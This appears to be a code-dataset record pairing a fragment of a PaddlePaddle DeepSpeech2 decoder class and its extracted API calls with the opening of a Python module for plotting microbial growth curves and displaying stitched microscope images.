from utils.decoder.swig_wrapper import ctc_beam_search_decoder_batch
class LM_decoder(object):
def __init__(self, beam_alpha, beam_beta, language_model_path,
vocab_list):
"""Initialize the external scorer.
:param beam_alpha: Parameter associated with language model.
:type beam_alpha: float
:param beam_beta: Parameter associated with word count.
:type beam_beta: float
:param language_model_path: Filepath for language model. If it is
empty, the external scorer will be set to
None, and the decoding method will be pure
beam search without scorer.
:type language_model_path: basestring|None
:param vocab_list: List of tokens in the vocabulary, for decoding.
:type vocab_list: list
"""
if language_model_path != '':
print("begin to initialize the external scorer "
"for decoding")
self._ext_scorer = Scorer(beam_alpha, beam_beta,
language_model_path, vocab_list)
lm_char_based = self._ext_scorer.is_character_based()
lm_max_order = self._ext_scorer.get_max_order()
lm_dict_size = self._ext_scorer.get_dict_size()
print("language model: "
"is_character_based = %d," % lm_char_based +
" max_order = %d," % lm_max_order +
" dict_size = %d" % lm_dict_size)
print("end initializing scorer")
else:
self._ext_scorer = None
print("no language model provided, "
"decoding by pure beam search without scorer.")
def decode_batch_beam_search(self, probs_split, beam_alpha, beam_beta,
beam_size, cutoff_prob, cutoff_top_n,
vocab_list, num_processes):
"""Decode by beam search for a batch of probs matrix input.
:param probs_split: List of 2-D probability matrix, and each consists
of prob vectors for one speech utterancce.
:param probs_split: List of matrix
:param beam_alpha: Parameter associated with language model.
:type beam_alpha: float
:param beam_beta: Parameter associated with word count.
:type beam_beta: float
:param beam_size: Width for Beam search.
:type beam_size: int
:param cutoff_prob: Cutoff probability in pruning,
default 1.0, no pruning.
:type cutoff_prob: float
:param cutoff_top_n: Cutoff number in pruning, only top cutoff_top_n
characters with highest probs in vocabulary will be
used in beam search, default 40.
:type cutoff_top_n: int
:param vocab_list: List of tokens in the vocabulary, for decoding.
:type vocab_list: list
:param num_processes: Number of processes (CPU) for decoder.
:type num_processes: int
:return: List of transcription texts.
:rtype: List of basestring
"""
if self._ext_scorer != None:
self._ext_scorer.reset_params(beam_alpha, beam_beta)
# beam search decode
num_processes = min(num_processes, np.shape(probs_split)[0])
beam_search_results = ctc_beam_search_decoder_batch(
probs_split=probs_split,
vocabulary=vocab_list,
beam_size=beam_size,
num_processes=num_processes,
ext_scoring_func=self._ext_scorer,
cutoff_prob=cutoff_prob,
cutoff_top_n=cutoff_top_n)
results = [result[0][1] for result in beam_search_results]
return results
def _adapt_feeding_dict(self, feeding_dict):
"""Adapt feeding dict according to network struct.
To remove impacts from padding part, we add scale_sub_region layer and
sub_seq layer. For sub_seq layer, 'sequence_offset' and
'sequence_length' fields are appended. For each scale_sub_region layer
'convN_index_range' field is appended.
:param feeding_dict: Feeding is a map of field name and tuple index
of the data that reader returns.
:type feeding_dict: dict|list
:return: Adapted feeding dict.
:rtype: dict|list
"""
adapted_feeding_dict = copy.deepcopy(feeding_dict)
if isinstance(feeding_dict, dict):
adapted_feeding_dict["sequence_offset"] = len(adapted_feeding_dict)
adapted_feeding_dict["sequence_length"] = len(adapted_feeding_dict)
for i in xrange(self._num_conv_layers):
adapted_feeding_dict["conv%d_index_range" %i] = \
len(adapted_feeding_dict)
elif isinstance(feeding_dict, list):
adapted_feeding_dict.append("sequence_offset")
adapted_feeding_dict.append("sequence_length")
for i in xrange(self._num_conv_layers):
adapted_feeding_dict.append("conv%d_index_range" % i)
else:
raise ValueError("Type of feeding_dict is %s, not supported." %
type(feeding_dict))
return adapted_feeding_dict
def _adapt_data(self, data):
"""Adapt data according to network struct.
For each convolution layer in the conv_group, to remove impacts from
padding data, we can multiply zero to the padding part of the outputs
of each batch normalization layer. We add a scale_sub_region layer after
each batch normalization layer to reset the padding data.
For rnn layers, to remove impacts from padding data, we can truncate the
padding part before output data feeded into the first rnn layer. We use
sub_seq layer to achieve this.
:param data: Data from data_provider.
:type data: list|function
:return: Adapted data.
:rtype: list|function
"""
def adapt_instance(instance):
if len(instance) < 2 or len(instance) > 3:
raise ValueError("Size of instance should be 2 or 3.")
padded_audio = instance[0]
text = instance[1]
# no padding part
if len(instance) == 2:
audio_len = padded_audio.shape[1]
else:
audio_len = instance[2]
adapted_instance = [padded_audio, text]
# Stride size for conv0 is (3, 2)
# Stride size for conv1 to convN is (1, 2)
# Same as the network, hard-coded here
padded_conv0_h = (padded_audio.shape[0] - 1) // 2 + 1
padded_conv0_w = (padded_audio.shape[1] - 1) // 3 + 1
valid_w = (audio_len - 1) // 3 + 1
adapted_instance += [
[0], # sequence offset, always 0
[valid_w], # valid sequence length
# Index ranges for channel, height and width
# Please refer scale_sub_region layer to see details
[1, 32, 1, padded_conv0_h, valid_w + 1, padded_conv0_w]
]
pre_padded_h = padded_conv0_h
for i in xrange(self._num_conv_layers - 1):
padded_h = (pre_padded_h - 1) // 2 + 1
pre_padded_h = padded_h
adapted_instance += [
[1, 32, 1, padded_h, valid_w + 1, padded_conv0_w]
]
return adapted_instance
if isinstance(data, list):
return map(adapt_instance, data)
elif inspect.isgeneratorfunction(data):
def adapted_reader():
for instance in data():
yield map(adapt_instance, instance)
return adapted_reader
else:
raise ValueError("Type of data is %s, not supported." % type(data))
def _create_parameters(self, model_path=None):
"""Load or create model parameters."""
if model_path is None:
self._parameters = paddle.parameters.create(self._loss)
else:
self._parameters = paddle.parameters.Parameters.from_tar(
gzip.open(model_path))
def _create_network(self, vocab_size, num_conv_layers, num_rnn_layers,
rnn_layer_size, use_gru, share_rnn_weights):
"""Create data layers and model network."""
# paddle.data_type.dense_array is used for variable batch input.
# The size 161 * 161 is only an placeholder value and the real shape
# of input batch data will be induced during training.
audio_data = paddle.layer.data(
name="audio_spectrogram",
type=paddle.data_type.dense_array(161 * 161))
text_data = paddle.layer.data(
name="transcript_text",
type=paddle.data_type.integer_value_sequence(vocab_size))
seq_offset_data = paddle.layer.data(
name='sequence_offset',
type=paddle.data_type.integer_value_sequence(1))
seq_len_data = paddle.layer.data(
name='sequence_length',
type=paddle.data_type.integer_value_sequence(1))
index_range_datas = []
for i in xrange(num_rnn_layers):
index_range_datas.append(
paddle.layer.data(
name='conv%d_index_range' % i,
type=paddle.data_type.dense_vector(6)))
self._log_probs, self._loss = deep_speech_v2_network(
audio_data=audio_data,
text_data=text_data,
seq_offset_data=seq_offset_data,
seq_len_data=seq_len_data,
index_range_datas=index_range_datas,
dict_size=vocab_size,
num_conv_layers=num_conv_layers,
num_rnn_layers=num_rnn_layers,
rnn_size=rnn_layer_size,
use_gru=use_gru,
share_rnn_weights=share_rnn_weights)
|
[
"copy.deepcopy",
"gzip.open",
"numpy.shape",
"inspect.isgeneratorfunction",
"utils.decoder.swig_wrapper.Scorer",
"utils.decoder.swig_wrapper.ctc_beam_search_decoder_batch"
] |
[((3843, 4070), 'utils.decoder.swig_wrapper.ctc_beam_search_decoder_batch', 'ctc_beam_search_decoder_batch', ([], {'probs_split': 'probs_split', 'vocabulary': 'vocab_list', 'beam_size': 'beam_size', 'num_processes': 'num_processes', 'ext_scoring_func': 'self._ext_scorer', 'cutoff_prob': 'cutoff_prob', 'cutoff_top_n': 'cutoff_top_n'}), '(probs_split=probs_split, vocabulary=\n vocab_list, beam_size=beam_size, num_processes=num_processes,\n ext_scoring_func=self._ext_scorer, cutoff_prob=cutoff_prob,\n cutoff_top_n=cutoff_top_n)\n', (3872, 4070), False, 'from utils.decoder.swig_wrapper import ctc_beam_search_decoder_batch\n'), ((4898, 4925), 'copy.deepcopy', 'copy.deepcopy', (['feeding_dict'], {}), '(feeding_dict)\n', (4911, 4925), False, 'import copy\n'), ((1435, 1497), 'utils.decoder.swig_wrapper.Scorer', 'Scorer', (['beam_alpha', 'beam_beta', 'language_model_path', 'vocab_list'], {}), '(beam_alpha, beam_beta, language_model_path, vocab_list)\n', (1441, 1497), False, 'from utils.decoder.swig_wrapper import Scorer\n'), ((8092, 8125), 'inspect.isgeneratorfunction', 'inspect.isgeneratorfunction', (['data'], {}), '(data)\n', (8119, 8125), False, 'import inspect\n'), ((3787, 3808), 'numpy.shape', 'np.shape', (['probs_split'], {}), '(probs_split)\n', (3795, 3808), True, 'import numpy as np\n'), ((8685, 8706), 'gzip.open', 'gzip.open', (['model_path'], {}), '(model_path)\n', (8694, 8706), False, 'import gzip\n')]
|
import os
import pathlib
import re
import time
import sys
import json
import cv2
import h5py
import math
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.path as mpath
import matplotlib.lines as mlines
import matplotlib.patches as mpatches
import matplotlib as mpl
from scipy.sparse import csr_matrix
from fast_histogram import histogram1d
from datetime import datetime
from importlib import reload
from PyQt5 import QtCore, QtGui, QtWidgets
# from PyQt5.QtMultimedia import QMediaPlayer
# from PyQt5.QtMultimedia import QMediaContent
# from PyQt5.QtMultimediaWidgets import QVideoWidget
from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog
from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction
from PyQt5.QtGui import QImage, QPixmap, QIcon
from PyQt5.QtCore import QDir, Qt, QUrl
import tools.imagepl as opl
import tools.fileio as fio
def figPlotGCs(roiDict, organism='Yeast', saveAll=False, savePath=None):
''' Plots growth curves using matplotlib'''
plt.close('all')
pltRange = setPlotRange(organism)
roiID = roiDict['roi']
timePoints = roiDict['timePoints']/pltRange['GCs']['devisor']
rawobjectArea = roiDict['objectArea']
rawfitData = roiDict['fitData']
numObsv = pltRange['GCs']['numObservations']
rngTime = pltRange['GCs']['xRange']
rngArea = pltRange['GCs']['yRange']
rngTdbl = pltRange['Dbl']['xRange']
rngTlag = pltRange['Lag']['xRange']
rngTexp = pltRange['Tex']['xRange']
rngNDub = pltRange['NumDbl']['xRange']
if len(roiDict['roiInfo'])>0 :
roiID = roiDict['roiInfo']['Strain ID']
numObservations = np.sum(rawobjectArea>0, 1) > numObsv
numDbl = rawfitData[:,1]>0
fitIndex = rawfitData[:,0]>0
dataFilter = numObservations * fitIndex * numDbl
fitData = rawfitData[dataFilter, :]
objectArea = rawobjectArea[dataFilter,:].transpose()
fitData[:,3]/=pltRange['Tex']['devisor']
fitData[:,5]/=pltRange['Lag']['devisor']
fitData[:,6]/=pltRange['Dbl']['devisor']
textLbls= ['Growth Curves','Td (hrs)', 'Tlag (hrs)','Texp (hrs)','Num Dbl']
lineColor = np.array([ [0, 0, 0, 0.3],
[0, 0, 1, 1],
[0, 0.7, 0, 1],
[1, 0, 0, 1],
[0.7,0.5, 0, 1]], dtype = 'float')
xLim = np.array([rngTime,
rngTdbl,
rngTlag,
rngTexp,
rngNDub], dtype = 'float64')
wScale = 0.75
numbins = 75
fitCol = [6,6,5,3,1]
normVirts = np.zeros((5,numbins), dtype='float64')
virts = np.zeros((5,numbins), dtype='float64')
nbins = np.zeros((5,numbins), dtype='float64')
for cnt in range(5):
nbins[cnt,:] = np.linspace(xLim[cnt,0], xLim[cnt,1], num=numbins)
virts[cnt,:] = histogram1d( fitData[:,fitCol[cnt]], 75, xLim[cnt,:], weights = None)
normVirts[cnt,:] = (virts[cnt,:]/np.max(virts[cnt,2:-10]))*wScale
axesPos = np.array([[0.1875, 0.66666667, 0.75, 0.28],
[0.1875, 0.48666667, 0.75, 0.1],
[0.1875, 0.33333333, 0.75, 0.1],
[0.1875, 0.19333333, 0.75, 0.1],
[0.1875, 0.05333333, 0.75, 0.1]], dtype = 'float64')
xLim = np.array([rngTime,
rngTdbl,
rngTlag,
rngTexp,
rngNDub], dtype = 'float64')
yLim = np.array( [rngArea,
[0,1],
[0,1],
[0,1],
[0,1]], dtype = 'float64')
Label_Font = 12
Title_Font = 12
mpl.rcParams['axes.linewidth'] = 2
mpl.rcParams['xtick.major.width'] = 2
mpl.rcParams['ytick.major.width'] = 2
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.direction'] = 'in'
mpl.rcParams['font.family'] = 'Arial'
mpl.rcParams['font.weight'] = 'bold'
mpl.rcParams['axes.titlesize'] = Title_Font
mpl.rcParams['axes.labelsize'] = Label_Font
gcFig = plt.figure(figsize=[4,7.5], dpi=100, facecolor='w')
axs = []
n = 0
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=yLim[n,:]))
axs[0].plot(timePoints, np.log2(objectArea), color=lineColor[n,:], linewidth=0.8)
axs[0].set_xlabel('Time (hrs)', fontsize=Label_Font, fontweight='bold')
axs[0].set_ylabel('log2[Area]', fontsize=Label_Font, fontweight='bold')
axs[0].set_title(roiID, fontsize=Label_Font, fontweight='bold')
for n in range(1,5):
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=yLim[n,:]))
axs[n].plot(nbins[n,:],normVirts[n,:],color=lineColor[n,:])
xPos = 0.7*np.abs(np.diff(xLim[n,:]))+xLim[n,0]
axs[n].text(xPos,0.75, textLbls[n], fontsize = Label_Font,fontweight='bold',color=lineColor[n,:])
if saveAll:
plt.savefig(savePath)
else:
plt.show()
return None
def figExpSummary(expDict, organism='Yeast'):
plt.close('all')
Label_Font = 12
Title_Font = 12
mpl.rcParams['axes.linewidth'] = 2
mpl.rcParams['xtick.major.width'] = 2
mpl.rcParams['ytick.major.width'] = 2
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.direction'] = 'in'
mpl.rcParams['font.family'] = 'Arial'
mpl.rcParams['font.weight'] = 'bold'
mpl.rcParams['axes.titlesize'] = Title_Font
mpl.rcParams['axes.labelsize'] = Label_Font
plotDict = setPlotRange(organism)
rngGCs = plotDict['GCs']['xRange']
rngTdbl = plotDict['Dbl']['xRange']
rngTlag = plotDict['Lag']['xRange']
rngTexp = plotDict['Tex']['xRange']
rngNDub = plotDict['NumDbl']['xRange']
rngPopNum = plotDict['PopNum']['xRange']
cntrLbl = ['Dbl', 'Lag', 'Tex', 'NumDbl', 'PopNum']
tickList = {}
left = 1.25/6
bottom = 0.4/10
width = 1.2/8
height = 9/10
spacing = 0.05/6
xLim = np.array([rngTdbl,
rngTlag,
rngTexp,
rngNDub,
rngPopNum], dtype = 'float64')
textLbls= ['Td (hrs)', 'Tlag (hrs)','Texp (hrs)','Num Dbl','Pop Cnt']
Path = mpath.Path
commands = {'M': (mpath.Path.MOVETO,),
'L': (mpath.Path.LINETO,),
'Q': (mpath.Path.CURVE3,)*2,
'C': (mpath.Path.CURVE4,)*3,
'Z': (mpath.Path.CLOSEPOLY,)}
numbins = 75
fitCol = [6,5,3,1]
# breakpoint()
devisor = [
plotDict['Dbl']['devisor'],
plotDict['Lag']['devisor'],
plotDict['Tex']['devisor'],
plotDict['NumDbl']['devisor']
]
roiList = [*expDict.keys()]
key1='roiInfo'
key2='Strain ID'
yTickLbl=[]
for roi in expDict.keys():
if len(expDict[roi][key1])>0:
yTickLbl.append(expDict[roi][key1][key2])
else:
yTickLbl.append(roi)
roiList = [x for _, x in sorted( zip(yTickLbl, roiList), key=lambda pair: pair[0])]
roiList.reverse()
yTickLbl.sort()
yTickLbl.reverse()
yTickLbl.insert(0,'')
yTickLbl.append('')
numRoi = len(roiList)
poptot = np.zeros((numRoi+1,2), dtype='int')
wScale = 0.8
pathDict = {}
cntr=0
for key in roiList:
cntr+=1
normVirts = np.zeros((5,numbins), dtype='float64')
virts = np.zeros((5,numbins), dtype='float64')
nbins = np.zeros((5,numbins), dtype='float64')
fitData = expDict[key]['fitData']
poptot[cntr,:] = fitData.shape
pathDict[key]={}
for n in range(4):
nbins[n,:] = np.linspace(xLim[n,0], xLim[n,1], num=numbins)
virts[n,:] = histogram1d( fitData[:,fitCol[n]]/devisor[n], numbins, xLim[n,:], weights = None)
normVirts[n,:] = (virts[n,:]/np.max(virts[n,2:-10]))*wScale
codes, verts = parseVirts(nbins[n,:], normVirts[n,:])
verts[:,1] += cntr-0.5
path = mpath.Path(verts, codes)
pathDict[key][textLbls[n]] = path
pathDict[key]['nbins'] = nbins
pathDict[key]['normVirts'] = normVirts
axesPos = np.zeros((5,4),dtype = 'float')
for n in range(5):
axesPos[n,:] = [left+n*(width+spacing),bottom,width,height]
gcFig = plt.figure(figsize=[7,9], dpi=100, facecolor='w')
axs = []
n = 0
xTicks = plotDict[cntrLbl[n]]['xTicks']
xticklabels = [str(value) for value in xTicks]
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=[0,numRoi+1], yticks=list(range(numRoi+1)), xticks=xTicks))
axs[n].set_yticklabels(yTickLbl, fontsize=6, fontweight = 'bold')
axs[n].set_xticklabels(xticklabels, fontsize=8, fontweight = 'bold', rotation= 45 )
axs[n].set_title(textLbls[n], fontsize=10, fontweight = 'bold' )
for roi in roiList:
patch = mpatches.PathPatch(pathDict[roi][textLbls[n]], facecolor = [0,0,1,1], edgecolor = None, linewidth = 0 )
axs[n].add_patch(patch)
for n in range(1,4):
xTicks = plotDict[cntrLbl[n]]['xTicks']
xticklabels = [str(value) for value in xTicks]
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=[0,numRoi+1], yticks=[], xticks=xTicks))
axs[n].set_xticklabels(xticklabels, fontsize=8, fontweight = 'bold', rotation= 45 )
axs[n].set_title(textLbls[n], fontsize=10, fontweight = 'bold' )
for roi in roiList:
patch = mpatches.PathPatch(pathDict[roi][textLbls[n]], facecolor = [0,0,1,1], edgecolor = None, linewidth = 0 )
axs[n].add_patch(patch)
n +=1
xTicks = plotDict[cntrLbl[n]]['xTicks']
xticklabels = [str(value) for value in xTicks]
ypos = np.arange(poptot.shape[0])
xstart = np.zeros((poptot.shape[0],),dtype = 'float')
axs.append(plt.axes(axesPos[n,:], xscale = 'log', xlim=[1,10000], ylim=[0,numRoi+1], yticks=[], xticks=xTicks))
axs[n].hlines(ypos, xstart, poptot[:,0], linewidth = 5, color = [0,0,1,1] )
axs[n].set_yticklabels(yTickLbl, fontsize=6, fontweight = 'bold')
axs[n].set_xticklabels(xticklabels, fontsize=8, fontweight = 'bold', rotation= 45 )
axs[n].set_title(textLbls[n], fontsize=10, fontweight = 'bold' )
plt.show()
return None
def stitchIm( roiLbl, imNum, imageDir, dataDir):
expPath = pathlib.Path(imageDir)
# indexList = [k for k in expPath.glob('*Index_ODELAYData.*')]
# Generate image file Path by combining the region of interest lable with the experiment path
roiFolder = pathlib.Path('./'+ roiLbl)
imageFileName = pathlib.Path('./'+ roiLbl + '_'+ f'{imNum:00d}' + '.mat')
imageFilePath = expPath / roiFolder / imageFileName
# Load Region of Interest Data. This HDF5 file should containt location of image stitch coordinates
dataPath = pathlib.Path(dataDir)
initPath = list(dataPath.glob('*Index_ODELAYData.hdf5'))
initData = fio.loadData(initPath[0])
background = initData['backgroundImage']
pixSize = initData['pixSize']
magnification = initData['magnification']
anImage = opl.stitchImage(imageFilePath, pixSize, magnification, background)
im = anImage['Bf']
imSize = im.shape
# This data should be recorded from image display to make sure the image is visible.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.cumsum(imageHist)
cumProb = (cumHist-cumHist[0])/(cumHist[2**16-1]-cumHist[0])
# set low and high values ot normalize image contrast.
loval = np.argmax(cumProb>0.00001)
hival = np.argmax(cumProb>=0.9995)
adjIm = np.array((im.astype('float') - loval.astype('float'))/(hival.astype('float') - loval.astype('float'))*254, dtype = 'uint8')
rsIm = cv2.resize(adjIm, (round(imSize[1]/5), round(imSize[0]/5)))
cv2.imshow('Display Image', rsIm)
k = cv2.waitKey(0)
if k == 107 or k == -1:
cv2.destroyWindow('Display Image')
return k
def showImage(roiLbl, imNum, imageDir, dataDir):
# image = odp.stitchImage(imageFileName, pixSize, magnification, background)
expPath = pathlib.Path(imageDir)
# Generate image file Path by combining the region of interest lable with the experiment path
roiFolder = pathlib.Path('./'+ roiLbl)
imageFileName = pathlib.Path('./'+ roiLbl + '_'+ f'{imNum:00d}' + '.mat')
imageFilePath = expPath / roiFolder / imageFileName
# Load Region of Interest Data. This HDF5 file should containt location of image stitch coordinates
dataPath = pathlib.Path(dataDir)
initPath = list(dataPath.glob('*Index_ODELAYData.hdf5'))
initData = fio.loadData(initPath[0])
roiPath = dataPath / 'ODELAY Roi Data' / f'{roiLbl}.hdf5'
roiData = fio.loadData(roiPath)
background = initData['backgroundImage']
# This data should be extracted from the Experiment Index file or stage data file.
pixSize = initData['pixSize']
magnification = initData['magnification']
stInd = f'{imNum-1:03d}'
stitchCorners = roiData['stitchMeta'][stInd]['imPix']
# breakpoint()
anImage = opl.assembleImage(imageFilePath, pixSize, magnification, background, stitchCorners)
im = anImage['Bf']
# im = opl.SobelGradient(im)
imSize = im.shape
# This data should be recorded from image display to make sure the image is visible.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.cumsum(imageHist)
cumProb = (cumHist-cumHist[0])/(cumHist[2**16-1]-cumHist[0])
# set low and high values ot normalize image contrast.
loval = np.argmax(cumProb>0.00001)
hival = np.argmax(cumProb>=0.9995)
adjIm = np.array((im.astype('float') - loval.astype('float'))/(hival.astype('float') - loval.astype('float'))*254, dtype = 'uint8')
rsIm = cv2.resize(adjIm, (round(imSize[1]/5), round(imSize[0]/5)))
cv2.imshow('Display Image', rsIm)
k = cv2.waitKey(0)
if k == 107 or k == -1:
cv2.destroyWindow('Display Image')
return k
def setPlotRange(organism=None):
plotRange = {}
plotRange['Mtb'] = {}
plotRange['Mtb']['GCs'] = {}
plotRange['Mtb']['Dbl'] = {}
plotRange['Mtb']['Lag'] = {}
plotRange['Mtb']['Tex'] = {}
plotRange['Mtb']['Area'] = {}
plotRange['Mtb']['NumDbl'] = {}
plotRange['Mtb']['PopNum'] = {}
plotRange['Mtb']['GCs']['xRange'] = [0, 170]
plotRange['Mtb']['GCs']['yRange'] = [4, 14]
plotRange['Mtb']['GCs']['xTicks'] = np.arange(0,100,20)
plotRange['Mtb']['GCs']['xLabel'] = 'Hours'
plotRange['Mtb']['GCs']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mtb']['GCs']['devisor'] = 60
plotRange['Mtb']['GCs']['numObservations'] = 20
plotRange['Mtb']['Dbl']['xRange'] = [0, 100]
plotRange['Mtb']['Dbl']['xTicks'] = [20,40,60,80]
plotRange['Mtb']['Dbl']['xStep'] = 5
plotRange['Mtb']['Dbl']['xLabel'] = 'Hours'
plotRange['Mtb']['Dbl']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mtb']['Dbl']['devisor'] = 60
plotRange['Mtb']['Lag']['xRange'] = [0, 100]
plotRange['Mtb']['Lag']['xTicks'] = [20,40,60,80]
plotRange['Mtb']['Lag']['xStep'] = 2
plotRange['Mtb']['Lag']['xLabel'] = 'Hours'
plotRange['Mtb']['Lag']['titleFrag'] = 'Lag Time Hr'
plotRange['Mtb']['Lag']['devisor'] = 60
plotRange['Mtb']['Tex']['xRange'] = [0, 100]
plotRange['Mtb']['Tex']['xTicks'] = [20,40,60,80]
plotRange['Mtb']['Tex']['xStep'] = 2
plotRange['Mtb']['Tex']['xLabel'] = 'Hours'
plotRange['Mtb']['Tex']['titleFrag'] = 'Tex Hr'
plotRange['Mtb']['Tex']['devisor'] = 30
plotRange['Mtb']['Area']['xRange'] = [0, 30]
plotRange['Mtb']['Area']['xTicks'] = [2,4,6,8]
plotRange['Mtb']['Area']['xStep'] = 0.25
plotRange['Mtb']['Area']['xLabel'] = 'log2 Pixels'
plotRange['Mtb']['Area']['titleFrag'] = 'log2 Area'
plotRange['Mtb']['Area']['devisor'] = 1
plotRange['Mtb']['NumDbl']['xRange'] = [0, 10]
plotRange['Mtb']['NumDbl']['xTicks'] = [2,4,6,8]
plotRange['Mtb']['NumDbl']['xStep'] = 0.25
plotRange['Mtb']['NumDbl']['xLabel'] = 'Num Dbl Rel'
plotRange['Mtb']['NumDbl']['titleFrag'] = 'Num Dbl Rel'
plotRange['Mtb']['NumDbl']['devisor'] = 1
plotRange['Mtb']['PopNum']['xRange'] = [0, 10000]
plotRange['Mtb']['PopNum']['xTicks'] = [10,100,1000]
plotRange['Mtb']['PopNum']['xStep'] = 10
plotRange['Mtb']['PopNum']['xLabel'] = 'log10 Pop'
plotRange['Mtb']['PopNum']['titleFrag'] = 'Pop Num'
plotRange['Mtb']['PopNum']['devisor'] = 1
plotRange['Mabs'] = {}
plotRange['Mabs']['GCs'] = {}
plotRange['Mabs']['Dbl'] = {}
plotRange['Mabs']['Lag'] = {}
plotRange['Mabs']['Tex'] = {}
plotRange['Mabs']['Area'] = {}
plotRange['Mabs']['NumDbl'] = {}
plotRange['Mabs']['PopNum'] = {}
plotRange['Mabs']['GCs']['xRange'] = [0, 70]
plotRange['Mabs']['GCs']['yRange'] = [4, 16]
plotRange['Mabs']['GCs']['xTicks'] = np.arange(0,70,10)
plotRange['Mabs']['GCs']['xLabel'] = 'Hours'
plotRange['Mabs']['GCs']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mabs']['GCs']['devisor'] = 60
plotRange['Mabs']['GCs']['numObservations'] = 20
plotRange['Mabs']['Dbl']['xRange'] = [0, 10]
plotRange['Mabs']['Dbl']['xTicks'] = [2,4,6,8]
plotRange['Mabs']['Dbl']['xStep'] = 0.5
plotRange['Mabs']['Dbl']['xLabel'] = 'Hours'
plotRange['Mabs']['Dbl']['titleFrag'] = 'Dbl Time Hr'
plotRange['Mabs']['Dbl']['devisor'] = 60
plotRange['Mabs']['Lag']['xRange'] = [0, 40]
plotRange['Mabs']['Lag']['xTicks'] = [10,20,30]
plotRange['Mabs']['Lag']['xStep'] = 1
plotRange['Mabs']['Lag']['xLabel'] = 'Hours'
plotRange['Mabs']['Lag']['titleFrag'] = 'Lag Time Hr'
plotRange['Mabs']['Lag']['devisor'] = 60
plotRange['Mabs']['Tex']['xRange'] = [0, 40]
plotRange['Mabs']['Tex']['xTicks'] = [10,20,30]
plotRange['Mabs']['Tex']['xStep'] = 1
plotRange['Mabs']['Tex']['xLabel'] = 'Hours'
plotRange['Mabs']['Tex']['titleFrag'] = 'Tex Hr'
plotRange['Mabs']['Tex']['devisor'] = 30
plotRange['Mabs']['Area']['xRange'] = [0, 30]
plotRange['Mabs']['Area']['xTicks'] = [20,40,60,80]
plotRange['Mabs']['Area']['xStep'] = 0.25
plotRange['Mabs']['Area']['xLabel'] = 'log2 Pixels'
plotRange['Mabs']['Area']['titleFrag'] = 'log2 Area'
plotRange['Mabs']['Area']['devisor'] = 1
plotRange['Mabs']['NumDbl']['xRange'] = [0, 10]
plotRange['Mabs']['NumDbl']['xTicks'] = [2,4,6,8]
plotRange['Mabs']['NumDbl']['xStep'] = 0.25
plotRange['Mabs']['NumDbl']['xLabel'] = 'log2 Pixels'
plotRange['Mabs']['NumDbl']['titleFrag'] = 'Num Dbl Rel'
plotRange['Mabs']['NumDbl']['devisor'] = 1
plotRange['Mabs']['PopNum']['xRange'] = [0, 10000]
plotRange['Mabs']['PopNum']['xTicks'] = [10,100,1000]
plotRange['Mabs']['PopNum']['xStep'] = 10
plotRange['Mabs']['PopNum']['xLabel'] = 'log10 Pop'
plotRange['Mabs']['PopNum']['titleFrag'] = 'Pop Num'
plotRange['Mabs']['PopNum']['devisor'] = 1
plotRange['Yeast'] = {}
plotRange['Yeast']['GCs'] = {}
plotRange['Yeast']['Dbl'] = {}
plotRange['Yeast']['Lag'] = {}
plotRange['Yeast']['Tex'] = {}
plotRange['Yeast']['Area'] = {}
plotRange['Yeast']['NumDbl'] = {}
plotRange['Yeast']['PopNum'] = {}
plotRange['Yeast']['GCs']['xRange'] = [0, 3000]
plotRange['Yeast']['GCs']['yRange'] = [4, 16]
plotRange['Yeast']['GCs']['xTicks'] = [100,200,300,400]
plotRange['Yeast']['GCs']['xStep'] = 4
plotRange['Yeast']['GCs']['xLabel'] = 'Minutes'
plotRange['Yeast']['GCs']['titleFrag'] = 'Time Min'
plotRange['Yeast']['GCs']['devisor'] = 1
plotRange['Yeast']['GCs']['numObservations'] = 10
plotRange['Yeast']['Dbl']['xRange'] = [25, 400]
plotRange['Yeast']['Dbl']['xTicks'] = [100,200,300,400]
plotRange['Yeast']['Dbl']['xStep'] = 4
plotRange['Yeast']['Dbl']['xLabel'] = 'Minutes'
plotRange['Yeast']['Dbl']['titleFrag'] = 'Dbl Time Min'
plotRange['Yeast']['Dbl']['devisor'] = 1
plotRange['Yeast']['Lag']['xRange'] = [0, 3000]
plotRange['Yeast']['Lag']['xTicks'] = [100,200,300,400, 500]
plotRange['Yeast']['Lag']['xStep'] = 1
plotRange['Yeast']['Lag']['xLabel'] = 'Minutes'
plotRange['Yeast']['Lag']['titleFrag'] = 'Lag Time Min'
plotRange['Yeast']['Lag']['devisor'] = 1
plotRange['Yeast']['Tex']['xRange'] = [0, 3000]
plotRange['Yeast']['Tex']['xTicks'] = [200,400,600,800,1000]
plotRange['Yeast']['Tex']['xStep'] = 1
plotRange['Yeast']['Tex']['xLabel'] = 'Minutes'
plotRange['Yeast']['Tex']['titleFrag'] = 'Tex Min'
plotRange['Yeast']['Tex']['devisor'] = 0.5
plotRange['Yeast']['Area']['xRange'] = [0, 40]
plotRange['Yeast']['Area']['xTicks'] = [10,20,30]
plotRange['Yeast']['Area']['xStep'] = 0.5
plotRange['Yeast']['Area']['xLabel'] = 'log2 Pixels'
plotRange['Yeast']['Area']['titleFrag'] = 'log2 Area'
plotRange['Yeast']['Area']['devisor'] = 1
plotRange['Yeast']['NumDbl']['xRange'] = [0, 10]
plotRange['Yeast']['NumDbl']['xTicks'] = [2,4,6,8]
plotRange['Yeast']['NumDbl']['xStep'] = 0.25
plotRange['Yeast']['NumDbl']['xLabel'] = 'log2 Pixels'
plotRange['Yeast']['NumDbl']['titleFrag'] = 'Num Dbl Rel'
plotRange['Yeast']['NumDbl']['devisor'] = 1
